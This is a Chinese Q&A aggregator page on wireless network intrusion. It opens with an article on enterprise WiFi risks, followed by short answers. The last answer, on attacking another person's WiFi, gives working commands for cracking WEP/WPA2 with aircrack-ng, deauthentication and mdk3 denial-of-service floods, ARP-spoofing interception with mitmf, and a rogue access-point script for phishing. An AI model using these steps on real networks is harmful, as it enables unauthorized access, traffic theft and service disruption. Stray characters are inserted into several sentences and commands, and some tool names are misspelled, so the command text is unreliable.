導航:首頁 > 無線網路 > 入侵無線網路

入侵無線網路

發布時間:2024-01-29 05:50:40

㈠ 由無線網路引發的內網入侵

Author: qingxp9

前幾日,一條關於"前員工入侵富士康網路:瘋狂洗白iPhone獲利300萬"的新聞刷爆了網路。員工通過在富士康內部秘密安裝無線路由器的方式侵入了蘋果公司的網路,通過為他人「改機、解鎖」手機共9000餘部,五個月違法所得共計300餘萬元。

這是一個利用企業無線網路達成入侵內網的典型案例。近年來,因無線網路導致的安全事件已經逐漸佔領了新聞的頭條,在某漏洞平台檢索時發現僅2015年便發生了數十起知名企業因WiFi相關安全問題導致內網被入侵的事件,對企業造成了十分惡劣的影響。

我們簡單回顧一下:

到了2016年,無線網路已經成為了企業移動化辦公的重要基礎設施。由於普遍缺乏有效的管理,無線網路也越來越多的成為黑客入侵企業內網的突破口。

回到開頭提到的富士康iphone刷機解鎖事件,通過新聞描述便可大致了解到整個攻擊過程:

攻擊者通過組合使用私接路由器和無線網橋的手法,可以將針對企業內網攻擊的實施范圍擴大到難以想像的幾十公里,極大增強了攻擊的隱秘性,這種攻擊手段值得警惕。

從天巡實驗室長期的測試和對無線網路安全防護的數據和經驗看,WiFi密碼泄漏、釣魚WiFi、私搭亂建WiFi成為目前企業WiFi網路的三大安全隱患。

1、密碼泄漏

WiFi密碼泄漏主要有以下4個方面的原因:

就現階段而言,WiFi密碼被不當分享的問題,已經成為了企業WiFi網路所面臨的最為首要的安全性問題。這主要是因為:考慮到成本和實施復雜度,家庭和小型企業都會選擇採用WPA-PSK加密方案,特點便是所有人使用相同的密碼。家用WiFi網路的使用者一般為3-5人,而企業WiFi網路往往有數十人,甚至成百上千多的人在同時使用,只要有一個人不慎將密碼分享了出來,密碼也就不再是秘密了。

某些第三方WiFi密碼分享平台的產品邏輯也進一步加劇了企業WiFi密碼被「意外分享」的節奏。比如,2015年初,媒體廣泛報道了某個知名的第三方WiFi密碼分享工具可能造成用戶信息泄漏的新聞。報道顯示,該產品在用戶安裝後,會默認勾選「自動分享熱點」選項。使用該軟體的近億用戶一旦接入任何企業的WiFi網路,都會自動的把企業的WiFi密碼分享出去,而這一過程企業網管幾乎完全無法控制和阻止。

2、員工私搭亂建WiFi給企業網路帶來安全隱患

在WiFi技術流行以前,企業內網中的電腦都是通過有線方式進行連接的,企業網路的拓撲結構和網路邊界通常也是固定的。但是,自從WiFi技術普及以來,企業的內網邊界正在變得越來越模糊。特別是私搭亂建的WiFi網路,給企業的內網安全造成了極大的隱患。

一般來說,企業員工私搭亂建WiFi網路主要有以下幾種形式:

私搭亂建的WiFi網路實際上是在那些已經得到准入授權的設備上開放了一個新的入口,使得那些未經授權的設備可以通過這個入口不受限制的接入內網系統,而且管理員往往很難發現。

3、釣魚WiFi是黑客入侵企業網路的重要途徑

2015年央視315晚會上,安全專家現場演示了釣魚WiFi的工作過程。在晚會現場,觀眾加入主辦方指定的一個WiFi網路後,用戶手機上正在使用哪些軟體、用戶通過微信朋友圈瀏覽的照片等信息就都被顯示在了大屏幕上。不僅如此,現場大屏幕上還展示了很多用戶的電子郵箱信息

㈡ wifi被入侵,QQ等聊天記錄被看見,且網路被人注入病毒,該怎麼

第一步先斷網,第二步看看防火牆是否關閉了,如果關閉了需要開起,第三步進行全盤掃描殺毒

㈢ 鄰居通過入侵我的wifi監視我的手機,怎麼辦

方法很簡單:

1、修改WIFI名稱,關閉WIFI的SSID廣播。然後再修改連接WIFI的連接密碼。

2、手機可以通過手動添加WiFi網路連接WiFi。方法:打開WLAN,添加其他網路。輸入網路SSID(WiFi名),選擇無線路由器的WiFi安全模式,輸入WiFi密碼即可。

3、手機直接用移動流量上網,關掉家裡的WIFI,這樣對方就不能入侵你的WIFI了。

㈣ 入侵無線網路問題

想要破解對方密碼,首先,你的網卡要支持BT3。
很遺憾,你的網卡不支持。。所以別想破解了。。
可以參考下http://www.anywlan.com/bbs/archiver/tid-13709.html

受限制,1是你IP沒設置對,2是對方路由沒承認你的物理地址。

㈤ 怎麼攻擊別人wifi

1.保密性
我們攻擊WIFI的第一個思路就是從保密性出發,我們希望從無線系統中獲取用戶的明文數據。首先,我們知道WIFI的的認證加密主要有以下四種方式:OPEN(無加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
OPEN的WIFI沒有採取認證加密措施,任意用戶均可鏈接WIFI,用戶數據在BSS(基本服務集)中明文傳輸,惡意用戶沒有任何門檻就可連接,然後通過中間人攻擊即可獲取用戶的數據(SSL、SSH等需要其他工具)。如下圖所示:
WEP、WPA、WPA2認證加密模式的WIFI需要破解獲取密碼,然後通過中間人或直接嗅探的方式獲取用戶明文數據。步驟就不詳述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。
WEP大概如下:
airomp-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕獲ivs數據包
aireplay-ng -3 -b 目標AP的MAC -h 某一個連接該AP的station的MAC wlan1mon #發送ARP包獲取加速獲取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下:
airomp-ng -w /workspace/sniff/airmon-wpa2 --bssid 目標AP的MAC -c AP所在chanle wlan1mon #嗅探無線數據,抓取handshake包
aireplay-ng -0 5 -a 目標AP的MAC -c 某一連接AP的station的MAC wlan1mon #發送deauth包,更快的獲取handshake
aircrack-ng -w 你的字典文件備老盯 /workspace/sniff/airmon-wpa2.cap #破解wpa2密碼
密碼破解成功後即可連接AP,通過中間人的方式獲取用戶仿和明文數據,或者直接用wireshark抓取加密包,然後通過airdecap-ng工具解密,然後用wireshark讀取已經解密的數據包。
破解WPA、WPA2不一定成功,取決於你字典是否強大,此時我們可以想辦法誘騙用戶主動輸入WIFI密碼,比如我們創建一個和目標AP具有同樣ESSID的軟AP,用戶可以連接上,單在瀏覽網頁時會彈出一個虛假的認證頁面,告訴用戶必須輸入WIFI的密碼,用戶只要輸入密碼我們即可獲取。可以利用fluxion、wifiphisher等工具實現。
wifiphisher將用戶輸入的密碼當做WIFI的密碼,但此密碼並沒有去驗證,如果用戶輸入錯誤,也會提示出該密碼。
而fluxion會將用戶輸入的密碼與handshake校驗,成功方認為獲取到密碼。
2.可用性
通過使目標用戶無法使用WIFI來破壞無線系統的可用性,通常通過DOS攻擊來實現,比如發送大量的deauth包來迫使用戶station與AP解除認證、連接。
aireplay -0 100 -a 目標AP的MAC -c攻擊的station的MAC wlan1mon #發送大量的deauth包,迫使目標station無法連接AP
mdk3 wlan1mon a -a 攻擊AP的MAC #mdk3可以偽造大量的station與AP連接,從而耗盡AP的資源造成DOS攻擊
3.真實性
(1)惡意用戶進入無線系統後,可通過中間人攻擊獲取或修改用戶數據。
ARP欺騙或DNS欺騙,ettercap工具非常方便。下面採用mitmf工具通過ARP欺騙將目標瀏覽網頁中的所有圖片上下顛倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通過driftnet工具抓取目標瀏覽網頁含桐時的圖片
driftnet -i wlan0
當然還可以利用中間人攻擊做很多事情,比如獲取cookie,嵌入js,結合beef進一步攻擊等等。。。
(2)偽造AP進行釣魚攻擊
airbase -ng -e airmon wlan1mon #創建釣魚熱點
然後通過下面的腳本開啟dhcp伺服器(必須先安裝isc-dhcp-server),開啟路由,開啟系統轉發,開啟防火牆nat等。
1 #!/bin/bash 2 3 echo '配置釣魚熱點...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待啟動dhcp伺服器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此時用戶可以不用密碼即可連接airmon熱點,並可以上網,但此時可以通過嗅探at0網卡獲取用戶數據。
4.完整性
篡改用戶數據,在WIFI攻擊這塊貌似用處不大。
5.不可抵賴性

閱讀全文

與入侵無線網路相關的資料

熱點內容
移動網路電視突然花屏 瀏覽:420
網路是否公網共享 瀏覽:126
網路技術論壇貼吧哪個好 瀏覽:696
投影儀怎麼操作連接網路 瀏覽:559
安陽汽車行業網路營銷方案 瀏覽:348
單機神經網路軟體 瀏覽:474
口袋妖怪顯示網路連接超時 瀏覽:860
湘潭網路營銷定製 瀏覽:807
三星共享網路數據 瀏覽:174
ip網路攝像機軟體 瀏覽:649
通過網路表達哪些民情民意 瀏覽:978
山上網路聯通和電信哪個好 瀏覽:281
安徽無線網路代碼 瀏覽:920
網路配件哪個平台好 瀏覽:900
哪個網路電視機資源多 瀏覽:861
榮耀8a手機能用電信網路嗎 瀏覽:307
華為手機丟了沒有網路能找回來嗎 瀏覽:374
蘋果8p怎麼黑解網路鎖 瀏覽:237
移動聯通電信網路電視有無線的嗎 瀏覽:517
沈陽理工大學計算機網路原理 瀏覽:45

友情鏈接